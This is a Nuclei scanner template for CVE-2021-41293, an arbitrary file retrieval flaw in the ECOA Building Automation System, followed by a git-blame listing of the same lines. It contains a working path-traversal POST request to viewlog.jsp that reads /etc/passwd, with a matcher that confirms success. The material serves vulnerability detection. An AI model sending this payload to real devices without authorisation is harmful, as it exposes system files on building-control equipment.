nuclei-templates/http/cves/2021/CVE-2021-41293.yaml

id: CVE-2021-41293

info:
  name: ECOA Building Automation System - Arbitrary File Retrieval
  author: 0x_Akoko
  severity: high
  description: The ECOA BAS controller suffers from an arbitrary file disclosure vulnerability. Using the 'fname' POST parameter in viewlog.jsp, attackers can disclose arbitrary files on the affected device and disclose sensitive and system information.
  remediation: |
    Apply the latest security patches or updates provided by the vendor to fix the arbitrary file retrieval vulnerability in the ECOA Building Automation System.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2021-41293
    - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5679.php
    - https://www.twcert.org.tw/tw/cp-132-5129-7e623-1.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-41293
    cwe-id: CWE-22
    epss-score: 0.03741
    epss-percentile: 0.90833
    cpe: cpe:2.3:o:ecoa:ecs_router_controller-ecs_firmware:-:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: ecoa
    product: ecs_router_controller-ecs_firmware
  tags: cve,cve2021,ecoa,lfi,disclosure

http:
  - raw:
      - |
        POST /viewlog.jsp HTTP/1.1
        Host: {{Hostname}}

        yr=2021&mh=6&fname=../../../../../../../../etc/passwd

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502205c6f82921b7d6d6e35ba08a54ee098603b2e84b025db526ea8077d2ca65fd6ea022100a2ab1823d633cd29ecfd2a5b31de802445d4d426b28c8a65ea2ff0e098115d38:922c64590222798bb761d5b6d8e72950
moving files around 2021-10-14 14:35:25 +00:00			`id: CVE-2021-41293`

Update ecoa-building-automation-lfd.yaml 2021-09-16 17:44:04 +00:00			`info:`
Dashboard Content Enhancements (#4381) Dashboard Content Enhancements 2022-05-13 20:26:43 +00:00			`name: ECOA Building Automation System - Arbitrary File Retrieval`
Update ecoa-building-automation-lfd.yaml 2021-09-16 17:44:04 +00:00			`author: 0x_Akoko`
Create ecoa-building-automation-lfd.yaml 2021-09-14 22:02:57 +00:00			`severity: high`
Added CPE and EPSS Score to CVE Templates 2023-04-12 10:55:48 +00:00			`description: The ECOA BAS controller suffers from an arbitrary file disclosure vulnerability. Using the 'fname' POST parameter in viewlog.jsp, attackers can disclose arbitrary files on the affected device and disclose sensitive and system information.`
Updated 2021 CVEs 2023-09-06 12:09:01 +00:00			`remediation: \|`
			`Apply the latest security patches or updates provided by the vendor to fix the arbitrary file retrieval vulnerability in the ECOA Building Automation System.`
More reference 2021-10-14 13:30:44 +00:00			`reference:`
Enhancement: cves/2021/CVE-2021-41293.yaml by mp 2022-03-07 15:36:19 +00:00			`- https://nvd.nist.gov/vuln/detail/CVE-2021-41293`
More reference 2021-10-14 13:30:44 +00:00			`- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5679.php`
			`- https://www.twcert.org.tw/tw/cp-132-5129-7e623-1.html`
Auto Generated CVE annotations [Thu Oct 14 14:37:07 UTC 2021] :robot: 2021-10-14 14:37:07 +00:00			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`cvss-score: 7.5`
Auto Generated CVE annotations [Thu Oct 14 14:37:07 UTC 2021] :robot: 2021-10-14 14:37:07 +00:00			`cve-id: CVE-2021-41293`
			`cwe-id: CWE-22`
TemplateMan Update [Tue Dec 12 11:07:51 UTC 2023] :robot: 2023-12-12 11:07:52 +00:00			`epss-score: 0.03741`
			`epss-percentile: 0.90833`
Updated 2021 CVEs 2023-09-06 12:09:01 +00:00			`cpe: cpe:2.3:o:ecoa:ecs_router_controller-ecs_firmware:-:::::::*`
Added max request counter of each template 2023-04-28 08:11:21 +00:00			`metadata:`
			`max-request: 1`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`vendor: ecoa`
			`product: ecs_router_controller-ecs_firmware`
			`tags: cve,cve2021,ecoa,lfi,disclosure`
Create ecoa-building-automation-lfd.yaml 2021-09-14 22:02:57 +00:00
Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
Create ecoa-building-automation-lfd.yaml 2021-09-14 22:02:57 +00:00			`- raw:`
			`- \|`
			`POST /viewlog.jsp HTTP/1.1`
			`Host: {{Hostname}}`

Update ecoa-building-automation-lfd.yaml 2021-09-14 22:24:11 +00:00			`yr=2021&mh=6&fname=../../../../../../../../etc/passwd`

Update and rename ecoa-building-automation-lfd.yaml to vulnerabilities/other/ecoa-building-automation-lfd.yaml 2021-09-17 11:09:09 +00:00			`matchers-condition: and`
Update ecoa-building-automation-lfd.yaml 2021-09-14 22:24:11 +00:00			`matchers:`
Create ecoa-building-automation-lfd.yaml 2021-09-14 22:02:57 +00:00			`- type: regex`
			`regex:`
Updated "/etc/passwd" regex to avoid possible false positive results. 2022-03-22 08:01:31 +00:00			`- "root:.*:0:0:"`
Update and rename ecoa-building-automation-lfd.yaml to vulnerabilities/other/ecoa-building-automation-lfd.yaml 2021-09-17 11:09:09 +00:00
			`- type: status`
			`status:`
			`- 200`
Auto Template Signing [Tue Dec 12 12:02:03 UTC 2023] :robot: 2023-12-12 12:02:03 +00:00			`# digest: 4a0a0047304502205c6f82921b7d6d6e35ba08a54ee098603b2e84b025db526ea8077d2ca65fd6ea022100a2ab1823d633cd29ecfd2a5b31de802445d4d426b28c8a65ea2ff0e098115d38:922c64590222798bb761d5b6d8e72950`